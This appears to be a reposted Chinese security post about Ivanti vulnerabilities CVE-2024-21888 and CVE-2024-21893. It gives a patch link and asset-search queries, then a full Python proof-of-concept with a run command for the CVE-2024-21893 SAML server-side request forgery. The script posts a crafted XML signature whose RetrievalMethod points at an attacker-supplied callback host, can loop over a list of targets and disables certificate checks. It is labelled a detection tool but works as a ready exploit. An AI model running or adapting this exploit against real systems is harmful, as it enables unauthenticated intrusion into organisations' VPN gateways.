【2024年2月1日】Ivanti公开两大【高危漏洞】:CVE-2024-21888 /CVE-2024-21893,存在提权危害;Threatbook支持相关组件查询。
【漏洞危害】:CVE-2024-21888该漏洞源于 Web 组件中存在权限提升漏洞,允许用户将权限提升至管理员的权限。
CVE-2024-21893该漏洞源于SAML 组件中的存在服务器端请求伪造漏洞,允许攻击者无需身份验证访问某些受限资。
一、【漏洞补丁链接】: https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US
二、【Threatbook 查询语法】:app="Ivanti-Connect-Secure" app="Ivanti-Policy-Secure"
三、工具利用
run python CVE-2024-21893.py -u target.com -a http://xxxxxxxxx.oastify.com
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
from urllib.parse import urlparse
def ensure_http(url):
if not url.startswith("http://") and not url.startswith("https://"):
return f"https://{url}"
return url
def send_poc(target_url, attacker_server):
payload_template = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
</ds:SignedInfo>
<ds:SignatureValue>qwerty</ds:SignatureValue>
<ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig#" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:RetrievalMethod URI="{attacker_server}"/>
<ds:X509Data/>
</ds:KeyInfo>
<ds:Object></ds:Object>
</ds:Signature>
</soap:Body>
</soap:Envelope>"""
target_url = ensure_http(target_url)
payload = payload_template.format(attacker_server=attacker_server)
parsed_url = urlparse(target_url)
full_path = parsed_url.path if parsed_url.path else "/dana-ws/saml20.ws"
host = parsed_url.netloc
headers = {
"Content-Type": "text/xml",
"User-Agent": "curl/8.4.0",
"Accept": "*/*",
"Connection": "close",
"Content-Length": str(len(payload))
}
response = requests.post(f"{parsed_url.scheme}://{host}{full_path}", data=payload, headers=headers, verify=False)
print(f"Sending PoC to {target_url}...")
def main():
parser = argparse.ArgumentParser(description='Send PoC to a target or targets from a list.')
parser.add_argument('-u', '--url', type=str, help='Single target URL')
parser.add_argument('-l', '--list', type=str, help='File path for a list of target URLs')
parser.add_argument('-a', type=str, required=True, help='Attacker server URL')
args = parser.parse_args()
if args.url:
send_poc(args.url, args.a)
elif args.list:
with open(args.list, 'r') as file:
for line in file:
target = line.strip()
if target:
send_poc(target, args.a)
else:
print("No target specified. Use -u for a single target or -l for a list of targets.")
if __name__ == "__main__":
main()
原文始发于微信公众号(Web安全工具库):提权漏洞CVE-2024-21893检测工具(2月3日更新)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论